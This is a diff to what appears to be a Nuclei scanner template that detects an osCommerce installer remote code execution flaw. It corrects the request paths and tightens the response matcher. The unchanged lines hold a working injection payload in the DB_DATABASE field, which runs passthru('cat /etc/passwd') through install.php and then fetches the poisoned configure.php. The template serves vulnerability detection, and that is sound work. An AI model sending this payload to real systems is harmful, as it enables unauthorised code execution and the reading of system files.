--- a/vulnerabilities/oscommerce/oscommerce-rce.yaml
+++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml
@@ -11,7 +11,7 @@ info:
 requests:
   - raw:
       - |
-        POST //install/install.php?step=4 HTTP/1.1
+        POST /install/install.php?step=4 HTTP/1.1
         Host: {{Hostname}}
         Accept-Encoding: gzip, deflate
         Accept: */*
@@ -23,7 +23,7 @@ requests:
         DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
 
       - |
-        GET //install/includes/configure.php HTTP/1.1
+        GET /install/includes/configure.php HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
         Accept-Encoding: gzip, deflate
@@ -32,9 +32,11 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - 'root'
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body
+
       - type: status
         status:
           - 200
